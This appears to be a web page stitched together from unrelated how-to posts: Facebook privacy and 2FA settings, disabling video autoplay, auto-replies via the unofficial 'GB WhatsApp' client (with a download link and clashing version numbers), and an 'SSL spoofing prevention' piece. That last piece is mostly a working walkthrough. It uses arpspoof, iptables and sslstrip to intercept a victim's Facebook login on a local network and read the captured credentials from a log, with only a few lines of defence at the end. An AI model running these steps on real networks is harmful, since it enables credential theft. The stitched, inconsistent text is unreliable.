How to protect your Facebook account

Here we walk you through the important settings you can change and behaviors you can implement to lock down your privacy on the social network.

Note: To change many of the settings below, Facebook will ask you to input your password. It’s a good reminder that if your password isn’t strong or unique to the site, now is the perfect time to change it!

Enable 2FA

If you only do one thing on the list in this article, do this: enable two-factor authentication (2FA). This means someone trying to break into your Facebook account needs more than just your password, they also need a second token that you own, be it a code or a physical key. The chances of someone having this in their possession are pretty small, so this step will stop most intruders in their tracks.

Facebook will walk you through the steps to enable 2FA on your account to help you get set up. You have a few options available to you for how you want to authenticate: you can choose to use a code sent to you by text message, which is easiest but not completely secure, or to use a code generated by an authenticator app on your phone, which takes a little more setup work.

If you’re really savvy and browsing using the website on a computer, Facebook also supports U2F keys like YubiKey, which is a physical key you plug into your computer’s USB port as your authentication token.

How to do it on your desktop: Go to your Facebook Settings and select Security and Login from the menu on the left. Next to Two-Factor Authentication click Edit and then Get Started.

How to do it in the app: Open Privacy shortcuts from the hamburger menu in the bottom left. Scroll down to the Account Security section and tap Use two-factor authentication. Choose whether you want to set up SMS 2FA or use an authenticator app.

You can turn on 2FA for your account from either the website or the app, you don’t have to do it in both places.

Get login alerts

If someone does manage to get into your Facebook account, you’ll want to know about it as soon as possible. If requested, Facebook can alert you to any strange-seeming logins to your account. You can be alerted via email, text message, Facebook message or even a Facebook in-app notification. It’s a little peace of mind and a very simple measure to set up.

How to do it on your desktop: In your Facebook settings, select Security and Login and scroll down to Setting up Extra Security. Hit the Edit button on Get alerts about unrecognized logins and customize how you’d like to be notified.

How to do it in the app: Open Privacy Shortcuts from the hamburger menu in the bottom left. Scroll down to the Account Security section and tap Receive alerts about unrecognised logins.

Check your connected apps

That quiz you took years ago about your star sign that you promptly posted and forgot about? All these years it’s had permission to see your profile, posts, and friends’ posts into perpetuity, so why does it still have this access?

You could have any number of apps like this quietly sniffing your information in the background. There’s an easy way to check what apps you might still have enabled, and disable them if you like. It’s best to have as few apps enabled as possible – and definitely remove permissions for any apps that you don’t recognize or remember using.

How to do it on your desktop: In your settings, go to Apps and Websites. Check the apps in your Active and Expired categories and remove any or all of them.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Scroll down to the Security section and tap Apps and Websites. Open Logged in using Facebook and check the apps in your “Active” and “Expired” categories and remove any or all of them.

Note, there is also a Business Integrations section, separate to Apps and Websites, that you might want to check for connected services too.

Be discriminating in how people find and contact you

The whole idea of Facebook is to reach out to friends and family and grow your network, but spammers and fake profiles seem to be some of the most enthusiastic users of the platform lately.

If you’re tired of getting suspicious Facebook friend invitations, or would rather not invite the risk of getting a phishy or malicious link on your Facebook wall, be discriminating in who you befriend. We suggest limiting who can contact and find you on the platform to “Friends of friends,” and to limit email and phone lookups to “Friends of friends” as well.

How to do it on your desktop: In settings, select Privacy. Modify your preferences for how you can be found on Facebook under the How people can find and contact you section.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Scroll down to the Privacy section and hit Privacy settings. Scroll down to How people can find and contact you. 

Call for backup: Choose friends to help if you’re locked out

If you’ve had issues in the past with your account being compromised – say if you’re a public figure or just very unlucky – Facebook has an option to let you select three to five people in your friends list who you can call on to help you gain control over your account if you’re ever unable to log in (say, because someone else has locked you out.)

This is not a feature that everyone will need, so if you don’t think it’s going to be that big a deal if you’re locked out of your account, feel free to skip this one. But if Facebook is your primary means for earning a living, or communicating with customers or your fanbase, this setting is worth your consideration.

The people you choose to be your backup – which Facebook calls your “trusted contacts” – should be people you know will be tech-savvy enough to know how to help you quickly (so, ideally someone who knows how to use a smartphone), and they should also know ahead of time that you’re choosing them to be a trusted contact, as Facebook will notify them that you’ve tapped them for this ‘honor’.

At no point will any of your trusted contacts have access to your Facebook account personally, nor will they be able to commandeer it at any time – they will be able to send you a code and a URL to help you log back into your account in case of an emergency.

How to do it: In Settings, go to Security and Login and scroll down to Setting up extra security. Hit edit on Choose 3 to 5 friends to contact if you get locked out and follow the instructions.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Under Security, tap Security and login and scroll down to Setting up Extra Security. Hit Choose 3 to 5 friends to contact if you are locked out.

Face recognition and tag privacy

Facebook maintains that it has face recognition capabilities for our own benefit – so we can know if we’re in a photo but haven’t been tagged, and someone can’t impersonate us by using our profile photo (we’re wise to your tricks, spambots!). But many of us also find this kind of tech creepy and intrusive. If you don’t want Facebook to proactively find you and identify you in photos, you can disable face recognition.

How to do it on your desktop: In Settings, select Face Recognition and then choose No.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Scroll down to Privacy and open Face recognition. Select No.

Note that face recognition isn’t the same as when people you know tag you in photos. If you don’t want people to tag you in photos or posts without your approval first, there’s another setting you’ll want to enable.

How to do it on your desktop: In Settings, go to Timeline and tagging and then choose On for both options in the Review section.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Scroll down to Privacy and open Timeline and tagging. Scroll down to Review and ensure both are set to On.

Keep your posts friends-only

You wouldn’t leave your front door open all the time. Why make the details of your personal life open and public for all the cybercriminals in the world to mine? Leaving your posts all public-facing is a gold-mine for criminals looking for details to try and guess security questions, or impersonate you to scam friends or family.

There’s a really easy solution here: Keep your Facebook posts out of the public eye and make the default privacy level friends-only. That way only the people you have approved and friended can see what you’re up to.

How to do it on your desktop: In settings, select Privacy. Under Your Activity set Who can see your future activity? to Friends, and click Limit past posts to retroactively make all your previous posts Friends-only as well.

How to do it in the app: Open Settings from the hamburger menu in the bottom left. Scroll down to Privacy and open Privacy settings. Under Your Activity set Who can see your future activity? to Friends, and also go back a step and turn on Limit who can see past posts too.

Be discriminating in what you do

Unfortunately, the risks to Facebook users are no longer just from external forces trying to break their way into your account. Unfortunately, we’ve learned in the last year or so that there have been a few Facebook-approved data miners, like Cambridge Analytica, that were given unfettered access to what Facebook users were up to behind the garden walls.

So the steadfast internet advice applies here as anywhere: Mind what you post, and remember that the internet is forever. Even content you post behind the friends-only filter on Facebook is not an ironclad guarantee of privacy, so use discretion and if your gut is telling you to not hit that “post” button, it’s best to listen.

How to stop sites from automatically playing videos on your desktop

One of the pesky things about surfing the internet is the recent barrage of autoplaying videos on websites.

You might be at work, opening a website to read some news, and suddenly a video will blast through your speakers. Worry not, we’ve got you covered. Here are some nifty ways you stop videos from playing automatically.

1. WEBSITES SETTINGS

Social networks like Twitter and Facebook allow you to turn off autoplay directly from the settings menu. On Twitter, you’d find this option under ‘Setting> Content’.

Meanwhile, Facebook provides this toggle under ‘Setting> Video’.

If you don’t want to do this, browsers now allow you to turn off autoplay videos too.

Chrome

Google has built some autoplay options directly into Chrome. For instance, you can allow your browser to autoplay videos, but mute them at the same time. To do so, you can click on a particular tab to select ‘mute website’.

Alternatively, to turn off autoplaying videos altogether, type ‘chrome://flags/#autoplay-policy’ in the address bar and hit enter. Then select ‘Document user activation is required’. Now, a video will only play when you click on it.

There are plenty of extensions in the Chrome Store to help you out as well. Google said recently that it is working on a simpler solution for this task.

Safari

Apple’s browser doesn’t have a setting to stop autoplay for all sites. But it allows you to choose if you want to stop a particular site from automatically playing videos. Right click on the address bar to select ‘Settings for this website.’ Under that, you can choose either ‘Stop Media with Sound’ or ‘Never Auto-Play.’

Firefox

Firefox allows an easy option to stop autoplay for all the websites that play media with sound automatically. Under ‘Preferences,’ go to ‘Privacy & Security’ tab and select ‘Always Ask’ or ‘Don’t Autoplay’ for a peace of your mind.

Mircosoft Edge

It is pretty simple to turn off videos that autoplay in Edge. Go to ‘Settings> Advanced> Media Autoplay’ and select ‘Limit’ or ‘Block.’

You can change settings for individual websites as well through media autoplay settings for each website by clicking on the certificate icon.

Hope this guide makes your internet experience more enjoyable. We’ll update this post if we find about any other methods to save yourself from the tediousness of autoplay.

Setting up Auto Reply message on whatsapp

WhatsApp has grown to be one of the most widely used instant messaging service. Nowadays even organizations use it to connect with customers. Sometimes customers have frequently asked questions. Due to lack of man power or time, organizations are unable to answer all the queries in real time.

Setting up automated, predefined messages to these common questions on WhatsApp can aid the smooth running of  businesses. Sending an automated reply to WhatsApp message creates a better impression in customer’s mind. Not just organizations but this could also help individuals.

So to set this up, you will need the latest version of gb WhatsApp which was launched earlier this month, which has the " Auto reply" feature.

The latest release version of GB WhatsApp version 6.40 came with auto reply. This means that you can set auto reply messages for both group chat and private chat. The interesting thing is that you can also schedule time to reply back messages and time to stop replying back.

In other to set up auto reply message you may need to download latest GB WhatsApp. After downloading please kindly install and launch it.click on the 3 dots option button then click on GB settings, you will see auto reply message then click on it and enable it.

Click plus button  to create new auto reply message. Click auto reply message and write  your feed back text e.g "I received your message, I will respond to you shortly". Repeat the same method you want your message to be delayed, after which you set receiver. Receiver could be your contact & group chat then set specific start time and end time. After that click add and you are set to go.

Click here to download GB WhatsApp version 6.0

How to Prevent SSL Spoofing

Have you ever tried making a transaction online or simply opening a page and your prompted that "the connection is not secure"? Well, that's because the SSL(HTTPS) which is supposed to provide a secure connection to the website or page you’re connecting to has been compromised.

I am going to show you guys how to simulate ssl attack and how best to prevent them.........

There are a couple of tools available online to perform ssl spoofing some of which include; sslstrip, arpspoof, kali linux operating system.

WHAT IS SSLSTRIP?

SSLStrip is a Man-in-the-Middle attack tool that allows attackers to manipulate internet traffic and capture data such as usernames and passwords; it works by converting https requests into basic http requests.

So how does this attack work?

There are two components to this attack. First, we need our hands on the target’s internet traffic and we are going to accomplish this by using a tool called ARPSpoof which is essentially used to trick the router into sending the target’s internet traffic to our computer instead of sending it to the website that the target is trying to communicate with.

We have a demonstration to illustrate it

This is assuming that the attacker has already started SSLstrip and ARPspoofing.

i. The first thing that is going to happen is, the victim is going to open their web browser and attempt to connect to a website via https,

ii. Because were running ARPspoof, the router is going to forward that traffic the victims request to us, the attacker and were going to cycle it through SSLstrip and convert the https request into an http request,

iii. Then were going to send that request back to the router which will then send it to the website as the target of the victim initially intended,

iv. The website is going to finally respond and the victim is going to be connected via http. Now we have accomplished our main goal which is to force the victim to use http.

NOTE: Now if the victim goes to facebook, they’re going to enter their login information and click the login the login button, their username and password id going to be sent to the router which is then forwarded to us the attacker because were using ARPspoof. 

We will cycle it through SSLstrip which will read and log the data and it’s going to be sent back to the router which is then sent back to the website. The website would process the login information and assuming they enter the correct credentials, they will be taken to their account. The victim won’t be aware of it because essentially, that data is simply passing through us and there’s no indication that it is doing so.

Steps

1.     Make sure your computer and the victims computer are on the same network

2.    Open Terminal in kaliLinux; we need to find the name of our network adapter or the interface that we use to connect to the target network: type ifconfig and click “Enter” as showed below;

3. We need to enable ipv4 reading so our computer can route traffic. We type this in terminal: 

         echo “1” > /proc/sys/net/ipv4/ip_forward as showed below and click “Enter:”

4. Here, we need to configure ip tables so our computer can redirect traffic as we need it to. 

       Type : Iptables  –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port             8080 and click “Enter” as showed below:

5. Next we need to find our gateway ip-address (ip address of router, modem, Wi-Fi) that we are connected to. Type Route –n  and click “Enter:” as showed below

6. Next Scan target for specific computers by using the nmap switch by typing : nmap sS –O 192.168.21.2/24 and click “Enter” as showed below:

7. Next, we need to start ARPspoof to redirect out targets http traffic to our computer by typing arpspoof –i eth0 –t 192.168.21.129 –r 192.168.21.2 as showed below.

8. Now, we open a new terminal and start sslstrip without closing the terminal that is running arpspoof. To start sslstrip type: sslstrip –l 8080 and press “Enter:” as showed below

9. Next, move over to target computer and simulate a victim. For example, a user trying to log into their Facebook account as showed below:

10. You note the secure link showing in 10 above will note be showing once the user logs on and. The user credentials will be captured by the attacker’s computer. Sslstrip will not display the username and password of its victim in its terminal but it places them in a log. To view the log open a terminal and type: cat sslstrip.log  and press “Enter:”, the result is as showed below

Finally, you have an overview of how an attacker can spoof ssl and compromise your account.However, there are several steps to take to prevent this attack from happening .Some of which include;

Ensure you are using secure connections. Look for the HTTPS.

Be careful about where you use secure sites.

Secure machines on the network.

Use static ARP tables. (for system administrators ).